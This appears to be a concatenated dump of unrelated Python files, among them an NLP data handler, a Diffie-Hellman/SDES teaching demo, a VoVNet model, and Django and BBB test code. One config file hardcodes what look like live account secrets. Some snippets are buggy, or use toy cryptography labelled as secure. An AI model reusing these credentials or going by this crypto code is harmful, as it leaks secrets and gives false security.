print('TO: kept {} instances for training and {} for eval'.format(len(self.train_to_text), len(self.dev_to_text)))
del(self.to_text)
del(self.from_text)
################################################ SORT INSTANCES BY SIZE
self.train_instances = sorted(list(zip(self.train_from_text, self.train_to_text)), key= lambda x: len(x[0].split())*10000+len(x[1].split()))
self.dev_instances = sorted(list(zip(self.dev_from_text, self.dev_to_text)), key= lambda x: len(x[0].split())*10000+len(x[1].split()))
self.number_of_train_instances = len(self.train_instances)
self.number_of_dev_instances = len(self.dev_instances)
# print('{} instances for training and {} for eval'.format(len(self.train_instances), len(self.dev_instances)))
# # print(self.dev_instances[0])
# # print(self.train_instances[0])
################################################
self.vocab = Counter()
self.vocab.update(Counter(' '.join(self.train_from_text).split()))
self.vocab.update(Counter(' '.join(self.train_to_text).split()))
################################################
self.vocab = sorted([
word
for word in tqdm(self.vocab, desc='Building VOCAB', ascii=True)
if(self.vocab[word]>=self.occur_thresh)
], key= lambda x: self.vocab[x])
self.vocab = ['<PAD>', '<UNK>', '<SOS>', '<EOS>'] + self.vocab
self.itos = dict(enumerate(self.vocab))
self.stoi = dict((v, k) for k,v in self.itos.items())
self.vocab_size = len(self.vocab)
print('Kept {} total words'.format(len(self.vocab)))
################################################
self.unk_token = '<UNK>'
self.pad_token = '<PAD>'
self.unk_index = self.stoi['<UNK>']
self.pad_index = self.stoi['<PAD>']
################################################
def fix_one_batch(self, batch):
max_len_s = max([len(row) for row in batch['src_ids']])
max_len_t = max([len(row) for row in batch['trg_ids']])
batch['src_ids'] = np.array([row + ([self.stoi['<PAD>']] * (max_len_s - len(row))) for row in batch['src_ids']])
batch['trg_ids'] = np.array([row + ([self.stoi['<PAD>']] * (max_len_t - len(row))) for row in batch['trg_ids']])
return batch
def iter_train_batches(self, batch_size):
self.train_total_batches = int(len(self.train_instances) / batch_size)
# pbar = tqdm(total=self.train_total_batches+1)
batch = {'src_ids': [], 'trg_ids': []}
for text_s, text_t in self.train_instances:
batch['src_ids'].append([self.stoi[token] if token in self.stoi else self.stoi['<UNK>'] for token in text_s.split()])
batch['trg_ids'].append([self.stoi[token] if token in self.stoi else self.stoi['<UNK>'] for token in text_t.split()])
if(len(batch['src_ids']) == batch_size):
# pbar.update(1)
yield self.fix_one_batch(batch)
batch = {'src_ids': [], 'trg_ids': []}
if(len(batch['src_ids'])):
# pbar.update(1)
yield self.fix_one_batch(batch)
def iter_dev_batches(self, batch_size):
self.dev_total_batches = int(len(self.dev_instances) / batch_size)
# pbar = tqdm(total=self.dev_total_batches+1, ascii=True)
batch = {'src_ids': [], 'trg_ids': []}
for text_s, text_t in self.dev_instances:
batch['src_ids'].append([self.stoi[token] if token in self.stoi else self.stoi['<UNK>'] for token in text_s.split()])
batch['trg_ids'].append([self.stoi[token] if token in self.stoi else self.stoi['<UNK>'] for token in text_t.split()])
if(len(batch['src_ids']) == batch_size):
# pbar.update(1)
yield self.fix_one_batch(batch)
batch = {'src_ids': [], 'trg_ids': []}
if(len(batch['src_ids'])):
# pbar.update(1)
yield self.fix_one_batch(batch)
def save_model(self, pickle_datapath):
data_handler_data = {
'stoi' : self.stoi,
'vocab' : self.vocab,
'data_path' : self.data_path,
'unk_token' : self.unk_token,
'pad_token' : self.pad_token
}
pickle.dump(data_handler_data, open(pickle_datapath, 'wb'))
print('Saved data handling model!')
def load_model(self, pickle_datapath):
data_handler_data = pickle.load(open(pickle_datapath, 'rb'))
self.stoi = data_handler_data['stoi']
self.itos = dict((v, k) for k,v in self.stoi.items())
self.data_path = data_handler_data['data_path']
self.unk_token = data_handler_data['unk_token']
self.pad_token = data_handler_data['pad_token']
self.vocab = data_handler_data['vocab']
self.vocab_size = len(self.vocab)
self.unk_index = self.stoi[self.unk_token]
self.pad_index = self.stoi[self.pad_token]
print('Loaded data handling model!')
def encode_one(self, text):
return np.array([
[
self.stoi[token] if token in self.stoi else self.stoi['<UNK>']
for token in bioclean(text).split()
]
])
|
18,722 | 78d86c92091530fae68c9b27f6b2e0a500307a1d | import socket
phone=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
phone.connect(('192.168.0.101',8000))
# while True:
# a=input("请输入称呼:")
# if not a:continue
# if a=='quit':break
# phone.send(a.encode("utf-8"))
# data=phone.recv(1024)
# print('服务端收到消息是:',data.decode("gbk"))
# phone.close() |
18,723 | ff7d78509fc9845899e23da5a762d10e72a06cbb | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-02-01 19:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_propiedad_img'),
]
operations = [
migrations.AlterField(
model_name='propiedad',
name='img',
field=models.BinaryField(),
),
]
|
18,724 | 9ac85017c774bf12c02f51a733012c75b8219869 | # You can also nest for loops with
# while loops. Check it out!
for i in range(4):
print("For loop: " + str(i))
x = i
while x >= 0:
print(" While loop: " + str(x))
x = x - 1
|
18,725 | 63806dc426c8b9a55a498ed637294555a3360a34 | from SDES import SDES, frombits
# Creates the public key, which is the first part of diffie-hellman key exchange
def publicKey(privateKey, g, prime):
return g**privateKey % prime
# Uses the public key to the other part and your private key to create the shared key
# The shared key is a secret key, which only Alice and Bob will know.
def sharedKey(publicKey, privateKey, prime):
return publicKey**privateKey % prime
# Blum blum shub implementation
def CSPRNG_BBS(seed, size):
p = 7
q = 11
M = p*q
bits = ""
for _ in range(size):
if seed < 2:
return "The seed can't be 0 or 1"
factorials = []
for i in range (1, seed + 1 , 1):
if seed % (i) == 0:
if i == p or i == q:
return "p and q can not be factors of the seed"
seed = (seed**2) % M
b = seed % 2
bits += str(b)
return bits
# Part 1
def main():
# the generator g is pre defined as 2
g = 2
# The shared prime is a Safe prime, decided by 2q+1, where q is a Sophie Germain prime
sharedPrime = 719
print("The shared prime is ", sharedPrime, '. Which gives us the cyclic group: Z*', sharedPrime)
print("The generator (g) is ", g)
# Alice and Bob's private keys which is secret.
alicePrivate = 217
bobPrivate = 131
print("Alice's private key is ", alicePrivate)
print("Bob's private key is ", bobPrivate)
# Creates the public key which can be sent over to the other part.
alicePublic = publicKey(alicePrivate, g, sharedPrime)
bobPublic = publicKey(bobPrivate, g, sharedPrime)
print("Alice's public key is ", alicePublic)
print("Bob's public key is ", bobPublic)
# Creates the shared secret key. Alice and Bob should have the same number
# If they not have the same number they do not use the same prime and generator
aliceShared = sharedKey(bobPublic, alicePrivate, sharedPrime)
bobShared = sharedKey(alicePublic, bobPrivate, sharedPrime)
if aliceShared == bobShared:
print("Alice's shared key is ", aliceShared)
print("Bob's shared key is ", bobShared)
else:
print("Something went wrong")
# Uses the pseudo-random number generator Blum Blum Shub to strengthen the key
# We choose how many bits long we want the key to be. In this case I chose 10
secretKeyBit = CSPRNG_BBS(aliceShared, 10)
secretKey = int(secretKeyBit, 2)
print("Stronger secret key is ", secretKey)
# You can either used my predefined message or write your own message to Bob
yesOrNo = input("Do you want to send a predefined message? y/n: ")
if yesOrNo == 'y' or yesOrNo == 'Y' or yesOrNo == 'yes':
message = "This is a super secret message"
else:
message = input("Write your own message to Bob: ")
print("Alices message is: ", message)
# Converts the message into bits
messageBits = ' '.join(format(ord(x), 'b').zfill(8) for x in message).split(' ')
encrypted = []
# Encrypts the message, by using SDES from Assignment 1.
# The key used in the encryption is the secret key we got from diffie-hellman and BBS.
for i in range(0, len(message)):
encrypted.append(SDES(messageBits[i], secretKeyBit))
print("Encrypted text from Alice to Bob: ", encrypted)
decrypted = ''
# Decrypts the message using the same key
for i in range (0, len(encrypted)):
decrypted += frombits(SDES(encrypted[i], secretKeyBit, True))
print("The message that Bob gets is: ", decrypted)
if __name__ == "__main__":
main()
|
18,726 | f930f54971ed4839dc35927f832233b47cc7e5ab | """ Adapted from the original implementation. """
import collections
import dataclasses
from typing import List
import torch
@dataclasses.dataclass
class VoVNetParams:
stem_out: int
stage_conv_ch: List[int] # Channel depth of
stage_out_ch: List[int] # The channel depth of the concatenated output
layer_per_block: int
block_per_stage: List[int]
dw: bool
_STAGE_SPECS = {
"vovnet-19-slim-dw": VoVNetParams(
64, [64, 80, 96, 112], [112, 256, 384, 512], 3, [1, 1, 1, 1], True
),
"vovnet-19-dw": VoVNetParams(
64, [128, 160, 192, 224], [256, 512, 768, 1024], 3, [1, 1, 1, 1], True
),
"vovnet-19-slim": VoVNetParams(
128, [64, 80, 96, 112], [112, 256, 384, 512], 3, [1, 1, 1, 1], False
),
"vovnet-19": VoVNetParams(
128, [128, 160, 192, 224], [256, 512, 768, 1024], 3, [1, 1, 1, 1], False
),
"vovnet-39": VoVNetParams(
128, [128, 160, 192, 224], [256, 512, 768, 1024], 5, [1, 1, 2, 2], False
),
"vovnet-57": VoVNetParams(
128, [128, 160, 192, 224], [256, 512, 768, 1024], 5, [1, 1, 4, 3], False
),
"vovnet-99": VoVNetParams(
128, [128, 160, 192, 224], [256, 512, 768, 1024], 5, [1, 3, 9, 3], False
),
}
_BN_MOMENTUM = 1e-1
_BN_EPS = 1e-5
def dw_conv(
in_channels: int, out_channels: int, stride: int = 1
) -> List[torch.nn.Module]:
""" Depthwise separable pointwise linear convolution. """
return [
torch.nn.Conv2d(
in_channels,
in_channels,
kernel_size=3,
padding=1,
stride=stride,
groups=in_channels,
bias=False,
),
torch.nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=True),
torch.nn.BatchNorm2d(out_channels, eps=_BN_EPS, momentum=_BN_MOMENTUM),
torch.nn.ReLU(inplace=True),
]
def conv(
in_channels: int,
out_channels: int,
stride: int = 1,
groups: int = 1,
kernel_size: int = 3,
padding: int = 1,
) -> List[torch.nn.Module]:
""" 3x3 convolution with padding."""
return [
torch.nn.Conv2d(
in_channels,
out_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
groups=groups,
bias=False,
),
torch.nn.BatchNorm2d(out_channels, eps=_BN_EPS, momentum=_BN_MOMENTUM),
torch.nn.ReLU(inplace=True),
]
def pointwise(in_channels: int, out_channels: int) -> List[torch.nn.Module]:
""" Pointwise convolution."""
return [
torch.nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=True),
torch.nn.BatchNorm2d(out_channels, eps=_BN_EPS, momentum=_BN_MOMENTUM),
torch.nn.ReLU(inplace=True),
]
class ESE(torch.nn.Module):
"""This is adapted from the efficientnet Squeeze Excitation. The idea is to not
squeeze the number of channels to keep more information."""
def __init__(self, channel: int) -> None:
super().__init__()
self.avg_pool = torch.nn.AdaptiveAvgPool2d(1)
self.fc = torch.nn.Conv2d(channel, channel, kernel_size=1) # (Linear)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.avg_pool(x)
out = self.fc(out)
return torch.sigmoid(out) * x
class OSA(torch.nn.Module):
def __init__(
self,
in_channels: int,
stage_channels: int,
concat_channels: int,
layer_per_block: int,
use_depthwise: bool = False,
) -> None:
""" Implementation of an OSA layer which takes the output of its conv layers and
concatenates them into one large tensor which is passed to the next layer. The
goal with this concatenation is to preserve information flow through the model
layers. This also ends up helping with small object detection.
Args:
in_channels: Channel depth of the input to the OSA block.
stage_channels: Channel depth to reduce the input.
concat_channels: Channel depth to force on the concatenated output of the
comprising layers in a block.
layer_per_block: The number of layers in this OSA block.
use_depthwise: Wether to use depthwise separable pointwise linear convs.
"""
super().__init__()
# Keep track of the size of the final concatenation tensor.
aggregated = in_channels
self.isReduced = in_channels != stage_channels
# If this OSA block is not the first in the OSA stage, we can
# leverage the fact that subsequent OSA blocks have the same input and
# output channel depth, concat_channels. This lets us reuse the concept of
# a residual from ResNet models.
self.identity = in_channels == concat_channels
self.layers = torch.nn.ModuleList()
self.use_depthwise = use_depthwise
conv_op = dw_conv if use_depthwise else conv
# If this model uses depthwise and the input channel depth needs to be reduced
# to the stage_channels size, add a pointwise layer to adjust the depth. If the
# model is not depthwise, let the first OSA layer do the resizing.
if self.use_depthwise and self.isReduced:
self.conv_reduction = torch.nn.Sequential(
*pointwise(in_channels, stage_channels)
)
in_channels = stage_channels
for _ in range(layer_per_block):
self.layers.append(
torch.nn.Sequential(*conv_op(in_channels, stage_channels))
)
in_channels = stage_channels
# feature aggregation
aggregated += layer_per_block * stage_channels
self.concat = torch.nn.Sequential(*pointwise(aggregated, concat_channels))
self.ese = ESE(concat_channels)
def forward(self, x: torch.Tensor) -> torch.Tensor:
if self.identity:
identity_feat = x
output = [x]
if self.use_depthwise and self.isReduced:
x = self.conv_reduction(x)
# Loop through all the
for layer in self.layers:
x = layer(x)
output.append(x)
x = torch.cat(output, dim=1)
xt = self.concat(x)
xt = self.ese(xt)
if self.identity:
xt += identity_feat
return xt
class OSA_stage(torch.nn.Sequential):
def __init__(
self,
in_channels: int,
stage_channels: int,
concat_channels: int,
block_per_stage: int,
layer_per_block: int,
stage_num: int,
use_depthwise: bool = False,
) -> None:
"""An OSA stage which is comprised of OSA blocks.
Args:
in_channels: Channel depth of the input to the OSA stage.
stage_channels: Channel depth to reduce the input of the block to.
concat_channels: Channel depth to force on the concatenated output of the
comprising layers in a block.
block_per_stage: Number of OSA blocks in this stage.
layer_per_block: The number of layers per OSA block.
stage_num: The OSA stage index.
use_depthwise: Wether to use depthwise separable pointwise linear convs.
"""
super().__init__()
# Use maxpool to downsample the input to this OSA stage.
self.add_module(
"Pooling", torch.nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
)
for idx in range(block_per_stage):
# Add the OSA modules. If this is the first block in the stage, use the
# proper in in channels, but the rest of the rest of the OSA layers will use
# the concatenation channel depth outputted from the previous layer.
self.add_module(
f"OSA{stage_num}_{idx + 1}",
OSA(
in_channels if idx == 0 else concat_channels,
stage_channels,
concat_channels,
layer_per_block,
use_depthwise=use_depthwise,
),
)
class VoVNet(torch.nn.Sequential):
def __init__(
self, model_name: str, num_classes: int = 10, input_channels: int = 3
) -> None:
"""
Args:
model_name: Which model to create.
num_classes: The number of classification classes.
input_channels: The number of input channels.
Usage:
>>> net = VoVNet("vovnet-19-slim-dw", num_classes=1000)
>>> with torch.no_grad():
... out = net(torch.randn(1, 3, 512, 512))
>>> print(out.shape)
torch.Size([1, 1000])
>>> net = VoVNet("vovnet-19-dw", num_classes=1000)
>>> with torch.no_grad():
... out = net(torch.randn(1, 3, 512, 512))
>>> print(out.shape)
torch.Size([1, 1000])
>>> net = VoVNet("vovnet-19-slim", num_classes=1000)
>>> with torch.no_grad():
... out = net(torch.randn(1, 3, 512, 512))
>>> print(out.shape)
torch.Size([1, 1000])
>>> net = VoVNet("vovnet-19", num_classes=1000)
>>> with torch.no_grad():
... out = net(torch.randn(1, 3, 512, 512))
>>> print(out.shape)
torch.Size([1, 1000])
>>> net = VoVNet("vovnet-39", num_classes=1000)
>>> with torch.no_grad():
... out = net(torch.randn(1, 3, 512, 512))
>>> print(out.shape)
torch.Size([1, 1000])
>>> net = VoVNet("vovnet-57", num_classes=1000)
>>> with torch.no_grad():
... out = net(torch.randn(1, 3, 512, 512))
>>> print(out.shape)
torch.Size([1, 1000])
>>> net = VoVNet("vovnet-99", num_classes=1000)
>>> with torch.no_grad():
... out = net(torch.randn(1, 3, 512, 512))
>>> print(out.shape)
torch.Size([1, 1000])
"""
super().__init__()
assert model_name in _STAGE_SPECS, f"{model_name} not supported."
stem_ch = _STAGE_SPECS[model_name].stem_out
config_stage_ch = _STAGE_SPECS[model_name].stage_conv_ch
config_concat_ch = _STAGE_SPECS[model_name].stage_out_ch
block_per_stage = _STAGE_SPECS[model_name].block_per_stage
layer_per_block = _STAGE_SPECS[model_name].layer_per_block
conv_type = dw_conv if _STAGE_SPECS[model_name].dw else conv
# Construct the stem.
stem = conv(input_channels, 64, stride=2)
stem += conv_type(64, 64)
# The original implementation uses a stride=2 on the conv below, but in this
# implementation we'll just pool at every OSA stage, unlike the original
# which doesn't pool at the first OSA stage.
stem += conv_type(64, stem_ch)
self.model = torch.nn.Sequential()
self.model.add_module("stem", torch.nn.Sequential(*stem))
self._out_feature_channels = [stem_ch]
# Organize the outputs of each OSA stage. This is the concatentated channel
# depth of each sub block's layer's outputs.
in_ch_list = [stem_ch] + config_concat_ch[:-1]
# Add the OSA modules. Typically 4 modules.
for idx in range(len(config_stage_ch)):
self.model.add_module(
f"OSA_{(idx + 2)}",
OSA_stage(
in_ch_list[idx],
config_stage_ch[idx],
config_concat_ch[idx],
block_per_stage[idx],
layer_per_block,
idx + 2,
_STAGE_SPECS[model_name].dw,
),
)
self._out_feature_channels.append(config_concat_ch[idx])
# Add the classification head.
self.model.add_module(
"classifier",
torch.nn.Sequential(
torch.nn.BatchNorm2d(
self._out_feature_channels[-1], _BN_MOMENTUM, _BN_EPS
),
torch.nn.AdaptiveAvgPool2d(1),
torch.nn.Flatten(),
torch.nn.Dropout(0.2),
torch.nn.Linear(self._out_feature_channels[-1], num_classes, bias=True),
),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.model(x)
def forward_pyramids(self, x: torch.Tensor) -> collections.OrderedDict:
"""
Args:
model_name: Which model to create.
num_classes: The number of classification classes.
input_channels: The number of input channels.
Usage:
>>> net = VoVNet("vovnet-19-slim-dw", num_classes=1000)
>>> net.delete_classification_head()
>>> with torch.no_grad():
... out = net.forward_pyramids(torch.randn(1, 3, 512, 512))
>>> [level.shape[-1] for level in out.values()] # Check the height/widths of levels
[256, 128, 64, 32, 16]
>>> [level.shape[1] for level in out.values()] == net._out_feature_channels
True
"""
levels = collections.OrderedDict()
levels[1] = self.model.stem(x)
levels[2] = self.model.OSA_2(levels[1])
levels[3] = self.model.OSA_3(levels[2])
levels[4] = self.model.OSA_4(levels[3])
levels[5] = self.model.OSA_5(levels[4])
return levels
def delete_classification_head(self) -> None:
""" Call this before using model as an object detection backbone. """
del self.model.classifier
def get_pyramid_channels(self) -> None:
""" Return the number of channels for each pyramid level. """
return self._out_feature_channels
|
18,727 | 1a6bbc20d6e81b803645b773b7e2f787e86400be | # write a python program to execute a string containing python code.
str="ankita"
var=""
b=[]
count=len(str)
while count>0:
var+=str[count+1]
count=count+1
print(var)
|
18,728 | 79eab321fae70465effdb41a05b4ec499ee6681e | import random as r
from pprint import pprint
import numpy as np
def tab_random_half(n,hashtab):
if (n%2==1):
return "Le nombre est impair"
res=[0 for i in range(n)]
list_int=[i for i in range(1,n+1)]
for i in range(n//2):
index=r.randint(0,len(list_int)-1)
value=list_int[index]
res[i]=value
res[n-(i+1)]=hashtab[value]
list_int.remove(value)
list_int.remove(n-value+1)
return res
def tab_random(n):
res=[0 for i in range(n)]
list_int=[i for i in range(1,n+1)]
for i in range(n):
index=r.randint(0,len(list_int)-1)
value=list_int[index]
res[i]=value
list_int.remove(value)
return res
def hash_tab(n):
hashtab={}
for i in range(1,n+1):
hashtab[i]=(n+1)-i
return hashtab
|
18,729 | 74cb8c3110c49f0461e6d8dc5689e6bc195909d9 | """
Unit test for cloud experimentation framework
"""
from lib import test_base
from lib import traffic
config_file_path = "/home/faiza/workspace/CEF/config/test_config.json"
log_file = "/home/faiza/workspace/CEF/results/output_log.txt"
#Test to ping vms in a mesh
class Test1(test_base.TestBase):
# xxx check what super does
def __init__(self, config_file):
test_base.TestBase.__init__(self, config_file)
# xxx check if name of a method of base and derived class can be same
def setup(self):
test_base.TestBase.setup(self)
def execute(self):
src_vms = []
dest_ips = []
for vpc in self.vpc_list:
for instance in vpc.aws_instances:
src_vms.append(instance)
dest_ips.append(instance.get_private_ip())
traffic_test = traffic.Traffic()
traffic_test.ping(src_vms, dest_ips, log_file)
def cleanup(self):
test_base.TestBase.cleanup(self)
if __name__ == "__main__":
test = Test1(config_file_path)
test.setup()
test.execute()
test.cleanup()
|
18,730 | c841bb31ed3c1c10a796200d6d8866cf2ede1b3e | import os
class Config(object):
PHOTO_BASE_URL = '/media/photos'
CROP_BASE_URL = '/media/crops'
ALLOWED_EXTENSIONS = set(['jpg', 'jpeg'])
#TODO - Get Secret Key working from environment variable. Might be an issue with OSX or Pycharm
SECRET_KEY = os.environ.get('SECRET_KEY')
#SECRET_KEY = 'ITsAS3cr3t!P4dding0utTHISBecauS31tS0uldB3loooonnnngggg'
CELERY_BROKER_URL='redis://localhost:6379',
CELERY_RESULT_BACKEND='redis://localhost:6379'
DEBUG = False |
18,731 | 93bab88b8d546b6fe2e33860ef123e0e08dafab7 | #!/usr/bin/python
"""
Copyright (c) 2013, Juniper Networks, Inc.
All rights reserved.
Author : Michael Ganley
manipulate paths to xml files.
"""
import argparse
from operator import index
import os
import sys
import shlex
import subprocess
import shutil
class manifestDir (object):
def __init__(self, options):
self.opt = options
def parse (self):
foo = os.path.split(self.opt.path_name)
if DEBUG:
print "manifest filename: ", foo[1]
foo = os.path.split(foo[0])
self.opt.sku = foo[1]
if DEBUG:
print "sku: ", self.opt.sku
foo = os.path.split(foo[0])
self.opt.product = foo[1]
if DEBUG:
print "product: ", self.opt.product
"""
Because when the find runs it pass the '.'
we have to skip over it.
"""
foo = os.path.split(foo[0])
foo = os.path.split(foo[0])
self.opt.buildid=foo[1]
if DEBUG:
print "Build ID: ", self.opt.buildid
foo = os.path.split(foo[0])
self.opt.branch = foo[1]
if DEBUG:
print "Branch: ", self.opt.branch
def fireProcedure (self):
if DEBUG:
print "Going to execute procedure"
command = "ectool runProcedure Contrail-CI-CD --procedureName Foo " \
"--actualParameter branch=" + self.opt.branch + \
" Platform=" + self.opt.product + \
" sku=" + self.opt.sku + \
" BuildId=" + self.opt.buildid
else:
command = "ectool runProcedure Contrail-CI-CD --procedureName PipeLine " \
"--actualParameter branch=" + self.opt.branch + \
" Platform=" + self.opt.product + \
" sku=" + self.opt.sku + \
" BuildId=" + self.opt.buildid
if DEBUG:
print "executing following command:\n", command
execute(command, ignore_errors=False)
def execute(command, ignore_errors=False):
""" Function to execute shell command and return the output """
if DEBUG:
print 'DEBUG: %s' % (command)
pipe = subprocess.Popen(shlex.split(command),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=True)
data = pipe.stdout.read()
rc = pipe.wait()
cwd = os.getcwd()
if rc and not ignore_errors:
print 'Error : Working directory : %s' % (cwd)
print 'Error : Failed to execute command: %s\n%s' % (command, data)
sys.exit(1)
return data.strip()
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def parse_options(args):
""" Parse command line arguments """
parser = argparse.ArgumentParser(description='Contrail/EC procedure wrapper script ')
parser.add_argument('-v', '--verbose', dest='debug', action='store_true',
help='Enable verbose mode')
parser.add_argument('-p', '--path', dest='path_name',
help="Full path to the manifest file")
subparsers = parser.add_subparsers(title='Fire off EC jobs based on the path to manifest file',
description='Select one command',
dest='command')
parser_parse = subparsers.add_parser('parse',
description='parse and execute build for manifest')
opt = parser.parse_args(args)
return opt
if __name__ == '__main__':
options = parse_options(sys.argv[1:])
DEBUG = options.debug
manifest = manifestDir(options)
""" Test to make sure all our commands exist """
if manifest.opt.command == 'parse':
manifest.parse()
manifest.fireProcedure()
sys.exit(0)
print "Unknown command: ", manifest.opt.command
sys.exit(1)
|
18,732 | ce876416b48a9150165f4bc314b04725a9b111fe | # -*- coding:utf-8 -*-
server_host = "tapi.jingtum.com" #"101.200.230.74" #"123.57.209.177" #"101.200.174.147" #"kapi.jingtum.com"
sercer_port = 443 #8001 #80
is_https = True
web_socket_address = "wss://tapi.jingtum.com:5443" #"ws://101.200.230.74:5443" #"ws://123.57.209.177:5445" #"ws://101.200.174.147:5443"
#testaddress = "j3x4oo2KvexqjBoG7J9HXYjpFz8cLT31B9"
issuer_account = "jHb9CJAWyB4jr91VRWn96DkukG4bwdtyTh"
issuer_secret = "snoPBjXtMeMyMHUVTgbuqAfg1SUTb"
issuer = "jBciDE8Q3uJjf111VeiUNM775AMKHEbBLS"
currency_ulimit_account = "jJ8PzpT7er3tXEWaUsVTPy3kQUaHVHdxvp"
currency_ulimit_secret = "shYK7gZVBzw4m71FFqZh9TWGXLR6Q"
|
18,733 | 2fc20446e1e402142b2a1f16e2760982b21c1e35 | class CsvTable:
def __init__(self, delim=","):
self._data = []
self._delim = delim
self._header = []
self._table = []
def load(self, fname):
with open(fname) as fd:
raw = [row.split(self._delim) for row in fd.read().splitlines()]
self._header = raw[0]
self._table = raw[1:]
return self
def header_count(self):
return len(self._header)
def header(self):
return self._header.copy()
def row(self, row_number, style='simple'):
if row_number < 0 or row_number > self.row_count():
raise IndexError(f"table has only {self.row_count()} rows")
result = []
if style == 'simple':
result = self._table[row_number].copy()
return result
def row_count(self):
return len(self._table)
def cell(self, row_number, column_name):
row = self.row(row_number)
col = self._header.index(column_name)
if col < 0:
raise IndexError(f"table has no {column_name} column")
return { column_name: row[col], "col_index": col }
def search(self, value, what='row_wise'):
if what == 'row_wise':
pass
elif what == 'col_wise':
pass
def dump(self):
return [self._header] + self._table
def __str__(self):
return str(self.dump())
if __name__ == "__main__":
t = CsvTable()
t.load(r"E:\Workspaces\Kurse\aktueller-kurs\Tag4\uebungen\bsp.csv")
print(t.header())
print(t.row(0))
print(t.cell(0, "Ort"))
print(t.header_count())
print(t.row_count())
print(t.dump())
print(t)
|
18,734 | 4e621c8660e7a4f9b6784af962b040125534f741 | from attackcti import attack_client
def malware():
lift = attack_client()
all_enterprise = lift.get_enterprise_malware()
if len(all_enterprise) - 350 != 0:
print("There is a new MALWARE!")
created = all_enterprise[0]["created"]
name = all_enterprise[0]["name"]
description = all_enterprise[0]["description"]
print(f"Created: {created}\nName: {name}\nDescription: {description}")
|
18,735 | b1737a2fe9f8ec059417ce4471be79817537b92a | from render_timeline import parse_states, extract_msg_steps, extract_clients
tlc_output = r'''
State 5: <client line 65, col 20 to line 69, col 40 of module two_client_reliable_channel>
/\ C = [ ClientInboxes |->
[ client1 |->
<< [ rawMsg |->
[ receiver |-> "client1",
sender |-> "client2",
msgLabel |-> "1",
senderState |-> 1,
receiverState |-> "",
sendAt |-> 2,
payload |-> 1,
recvAt |-> -1 ] ],
[ rawMsg |->
[ receiver |-> "client1",
sender |-> "client2",
msgLabel |-> "1",
senderState |-> 2,
receiverState |-> "",
sendAt |-> 3,
payload |-> 1,
recvAt |-> -1 ] ] >>,
client2 |-> <<>> ],
LogicalTime |-> 4,
MsgSteps |->
{ [ receiver |-> "client2",
sender |-> "client1",
msgLabel |-> "1",
senderState |-> 1,
receiverState |-> 3,
sendAt |-> 1,
payload |-> "",
recvAt |-> 4 ] },
NextMsgId |-> 3 ]
/\ GlobalCount = [client1 |-> 1, client2 |-> 3]
/\ MsgsSent = [client1 |-> 1, client2 |-> 2]
State 6: <client line 65, col 20 to line 69, col 40 of module two_client_reliable_channel>
/\ C = [ ClientInboxes |->
[ client1 |->
<< [ rawMsg |->
[ receiver |-> "client1",
sender |-> "client2",
msgLabel |-> "1",
senderState |-> 2,
receiverState |-> "",
sendAt |-> 3,
payload |-> 1,
recvAt |-> -1 ] ] >>,
client2 |-> <<>> ],
LogicalTime |-> 5,
MsgSteps |->
{ [ receiver |-> "client1",
sender |-> "client2",
msgLabel |-> "1",
senderState |-> 1,
receiverState |-> 2,
sendAt |-> 2,
payload |-> "",
recvAt |-> 5 ],
[ receiver |-> "client2",
sender |-> "client1",
msgLabel |-> "1",
senderState |-> 1,
receiverState |-> 3,
sendAt |-> 1,
payload |-> "",
recvAt |-> 4 ] },
NextMsgId |-> 3 ]
/\ GlobalCount = [client1 |-> 2, client2 |-> 3]
/\ MsgsSent = [client1 |-> 1, client2 |-> 2]
'''
def test_parse_states():
states = parse_states(tlc_output)
assert len(states) == 2
final_state = states[-1]
steps = extract_msg_steps(final_state)
assert len([ s.recvAt for s in steps if s.received ]) == 2
assert len([ s.recvAt for s in steps if not s.received ]) == 1
clients = extract_clients(final_state)
assert clients == ['client1', 'client2']
def test_parser_can_find_channels_under_any_name():
tlc_output_adjusted = tlc_output.replace(r'/\ C =', r'/\ OtherName =')
steps = extract_msg_steps(parse_states(tlc_output_adjusted)[-1])
assert len(steps) == 3
|
18,736 | bf5c207c2bc889aab7c9cba367c6523eedfb80a5 | import sys
sys.stdin = open("input.txt")
T = int(input())
def find_str(str_y, str_x):
for x in range(len(str_x)):
if str_x[x:x+len(str_y)] == str_y:
return 1
return 0
for tc in range(T):
str1 = input()
str2 = input()
print(f'#{tc+1} {find_str(str1, str2)}') |
18,737 | 24d17ec53f825b2e661fc18b4e6066f84ed2b13a | def pierwsza(liczba):
if (liczba < 2):
return False
else:
i = 2
while(i*i<=liczba):
if(liczba%i==0):
return False
i += 1
#print(i)
return True
#zadanie 6 - pierwsza
liczba = int(input('Podaj liczbę: '))
print("Liczba pierwsza", pierwsza(liczba)) |
18,738 | eccbde5e36f34981e9a970aca835393563f2fb8f | """Tests for the classroom API."""
import json
from unittest import mock
from django.test import TestCase, override_settings
from marsha.bbb import api, serializers
from marsha.bbb.factories import ClassroomFactory
from marsha.core import factories as core_factories
from marsha.core.factories import (
OrganizationAccessFactory,
PlaylistAccessFactory,
PlaylistFactory,
)
from marsha.core.models import ADMINISTRATOR
from marsha.core.simple_jwt.factories import (
InstructorOrAdminLtiTokenFactory,
StudentLtiTokenFactory,
UserAccessTokenFactory,
)
from marsha.core.tests.testing_utils import reload_urlconf
# We don't enforce arguments documentation in tests
# pylint: disable=unused-argument
@override_settings(BBB_API_ENDPOINT="https://10.7.7.1/bigbluebutton/api")
@override_settings(BBB_API_SECRET="SuperSecret")
@override_settings(BBB_ENABLED=True)
class ClassroomServiceJoinAPITest(TestCase):
"""Test for the Classroom API."""
maxDiff = None
@classmethod
def setUpClass(cls):
super().setUpClass()
# Force URLs reload to use BBB_ENABLED
reload_urlconf()
@mock.patch.object(api, "join")
@mock.patch.object(serializers, "get_meeting_infos")
def test_api_bbb_join_classroom_anonymous(
self, mock_get_meeting_infos, mock_join_request
):
"""An anonymous should not be able to join a classroom."""
classroom = ClassroomFactory()
response = self.client.patch(
